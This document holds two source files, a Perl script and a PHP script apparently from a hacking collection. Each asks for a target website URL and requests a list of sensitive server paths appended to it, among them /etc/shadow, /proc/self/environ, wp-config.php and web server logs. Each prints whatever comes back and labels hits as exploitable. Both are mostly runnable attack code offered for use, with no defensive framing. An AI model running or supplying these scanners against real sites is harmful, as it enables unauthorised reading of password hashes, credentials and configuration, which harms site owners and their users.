File: hacking_with_perl/insecure_file_handling.pl
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Parallel::ForkManager;
use Term::ANSIColor;

# Prompt user for target website URL
print colored("Enter your target website URL: ", "blue");
my $url = <STDIN>;
chomp($url);

# Check if URL is valid
unless ($url =~ m/^https?:\/\//i) {
    print colored("Invalid URL format. Please provide a valid URL starting with http:// or https://\n", "red");
    exit;
}

# Number of parallel processes
my $max_procs = 10; # Adjust according to system resources and network speed

# List of sensitive files and directories to check
my @files_to_check = (
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/etc/hostname",
    "/etc/resolv.conf",
    "/etc/network/interfaces",
    "/etc/ssh/sshd_config",
    "/etc/ssh/ssh_config",
    "/etc/apache2/apache2.conf",
    "/etc/apache2/httpd.conf",
    "/etc/nginx/nginx.conf",
    "/etc/nginx/sites-available/default",
    "/etc/mysql/my.cnf",
    "/etc/postgresql/9.6/main/pg_hba.conf",
    "/var/www/html/index.php",
    "/var/www/cgi-bin/",
    "/var/log/apache2/access.log",
    "/var/log/apache2/error.log",
    "/var/log/nginx/access.log",
    "/var/log/nginx/error.log",
    "/proc/self/environ",
    "/proc/net/tcp",
    "/proc/net/udp",
    "/proc/net/raw",
    "/proc/version",
    "/proc/cmdline",
    "/proc/mounts",
    "/proc/self/cmdline",
    "/proc/self/mountinfo",
    "/proc/self/status",
    "/proc/self/fd/0",
    "/proc/self/fd/1",
    "/proc/self/fd/2"
);


# Initialize user agent
my $ua = LWP::UserAgent->new;

# Fork manager for parallel processing
my $pm = Parallel::ForkManager->new($max_procs);

# Function to check for insecure file handling vulnerability
sub check_vulnerability {
    my ($file) = @_;

    my $response = $ua->get("$url$file");

    # Check HTTP response code and content for potential vulnerabilities
    if ($response->is_success) {
        print colored("[$file] Response: " . $response->status_line . "\n", "green");
        print colored("[$file] Content: " . $response->decoded_content . "\n", "green");
        if ($response->decoded_content =~ /root|shadow|localhost/) {
            print colored("[$file] Vulnerability found: File content indicates sensitive information!\n", "red");
            print colored("Exploit: Try accessing sensitive files via the URL directly.\n", "green");
        }
    } else {
        print colored("[$file] Error: " . $response->status_line . "\n", "red");
    }
}

# Check for vulnerability in parallel
foreach my $file (@files_to_check) {
    $pm->start and next;
    check_vulnerability($file);
    $pm->finish;
}
$pm->wait_all_children;

File: hacking_with_php/insecure_file_handling.php
<?php
// Function to display colored text
function colorize($text, $color) {
    $colors = [
        'red' => '0;31', 'green' => '0;32', 'yellow' => '1;33',
        'blue' => '0;34', 'magenta' => '0;35', 'cyan' => '0;36',
        'light_gray' => '0;37', 'dark_gray' => '1;30', 'light_red' => '1;31',
        'light_green' => '1;32', 'light_blue' => '1;34', 'light_magenta' => '1;35',
        'light_cyan' => '1;36', 'white' => '1;37'
    ];
    return "\033[" . $colors[$color] . "m" . $text . "\033[0m";
}

// Function to check if a URL is reachable
function isUrlReachable($url) {
    $headers = @get_headers($url);
    return $headers && strpos($headers[0], '200');
}

echo colorize("Enter your target website URL: ", 'cyan');
$target_url = trim(fgets(STDIN));

echo "Attempting to read sensitive files...\n";

// List of common sensitive files to test
$files_to_test = [
    '/etc/passwd',
    '/etc/shadow',
    '/etc/hosts',
    '/etc/resolv.conf',
    '/etc/apache2/apache2.conf',
    '/etc/apache2/sites-available/000-default.conf',
    '/etc/nginx/nginx.conf',
    '/etc/nginx/sites-available/default',
    '/etc/mysql/my.cnf',
    '/etc/php.ini',
    '/var/www/html/index.php',
    '/var/www/html/config.php',
    '/var/www/html/wp-config.php',
    '/var/log/apache2/access.log',
    '/var/log/apache2/error.log',
    '/var/log/nginx/access.log',
    '/var/log/nginx/error.log',
    '/var/log/mysql/error.log'
];

foreach ($files_to_test as $file) {
    $url = $target_url . $file;
    if (isUrlReachable($url)) {
        echo colorize("Vulnerable: $file is readable.\n", 'red');
        echo "Exploit: $url\n";
    } else {
        echo colorize("Not vulnerable: $file is not readable.\n", 'green');
    }
}
?>
